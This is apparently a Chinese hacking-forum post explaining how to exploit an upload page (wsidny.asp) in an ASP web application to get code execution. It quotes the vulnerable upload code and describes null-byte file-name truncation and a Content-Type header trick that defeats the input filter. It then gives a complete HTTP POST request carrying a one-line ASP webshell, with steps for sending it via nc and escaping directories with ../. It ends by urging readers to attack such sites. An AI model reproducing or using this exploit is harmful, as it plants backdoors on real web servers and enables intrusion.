By:rubbish
特征:login.asp能看到版权,不过有些箱子把这个地址改求了.另外主目录下存在一个wsidny.asp
整套程序过滤什么的灰常的严密,看得出来是专业的安全人士写的,唯一可以利用的地方就在这个wsidny.asp
看代码:
<!-- #include file="conn.asp"-->
<%
Server.ScriptTimeout = 36000
PostSize = Request.TotalBytes
if postsize=0 then
response.End()
end if
BytesRead = 0       
ReadSize=256
HeadSize=256
filename = Request.BinaryRead(ReadSize)
BytesRead = BytesRead + ReadSize       
PostData = Request.BinaryRead(PostSize - BytesRead)
StoreFile(filename)
Function Bytes2bStr(vin)
if lenb(vin) =0 then
Bytes2bStr = ""
exit function
end if
Dim BytesStream,StringReturn
set BytesStream = Server.CreateObject("ADODB.Stream")
BytesStream.Type = 2
BytesStream.Open
BytesStream.WriteText vin
BytesStream.Position = 0
BytesStream.Charset = "gb2312"
BytesStream.Position = 2
StringReturn = BytesStream.ReadText
BytesStream.close
set BytesStream = Nothing
Bytes2bStr = StringReturn
End Function
Function StoreFile(filename)
filea=Bytes2bStr(filename)
filea=LCase(filea)

if instr(filea,".")>0 then
fileb=split(filea,".")
num2=ubound(fileb)
if instr("jpg|gif|jpeg|png|bmp",fileb(num2))>0 then
filea=filea
else
filea=filea&".gif"
end if
else
filea=filea&".gif"
end if

Path=server.MapPath(imgFolder&filea)
Set oFileStream = CreateObject ("ADODB.Stream")
oFileStream.Type = 1
oFileStream.Mode = 3
oFileStream.Open
oFileStream.Write(PostData)
oFileStream.SaveToFile Path,2
oFileStream.Close
Set oFileStream = Nothing
End Function
Response.Write PostSize
Response.Write " bytes were read."       
%>没搞懂这个页面是用来干什么的,可能是生成图片破密保的吧.一开始是想本地构造表单直接提交,上传带;的图片马,结果因为是 Request.BinaryRead取的数据,所以urlencode过的参数都取不出来.改用vbs发包.这里又有个问题,因为路径是取的前256个 字符,超过了后面server.MapPath所支持的最大长度,于是想到了用\00截断,把vbs发送的http请求抓出来,用ue写截断,然后提交, 去掉包含文件测试成功.但是带包含的时候还报错.因为前面的conn.asp包含了一个fsql.asp防注页面,检查了request.form,调用 了request.form之后就不能再调用Request.BinaryRead了否则会报错.那这个页面的意义何在?
在这里纠结了好久,试着去掉http头里的Content-Type: application/x-www-form-urlencoded,提交,发现竟然上传成功鸟,这才发现自己以前一直SB了.去掉这一个头,iis就 会认为没有用表单格式提交的参数,这样用request.form就不会收到任何数据,也就不会跟后面的Request.BinaryRead冲突了
下面发利用方法:
POST /DNFZONX/wsidny.asp HTTP/1.1
Accept-Language: zh-cn
Content-Length: 284
Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-silverlight, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: xxx.fuck.com
Connection: Keep-Alive
a.asp aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<%execute request("value")%>
一句话代码前面要构造到256个字符,然后在ue里面把空格用\00代替,改下主机头啥的,NC提交,看到返回xxx bytes were read.的话,就成功了,目标文件夹下img/a.asp就是了,如果图片目录找不到或者不可执行啥的,可以用../什么的跳出来就好了,只要保证一句 话前面刚好有256个字符就是了
本地测试成功,大家遇到箱子信封什么的,就使劲的日吧!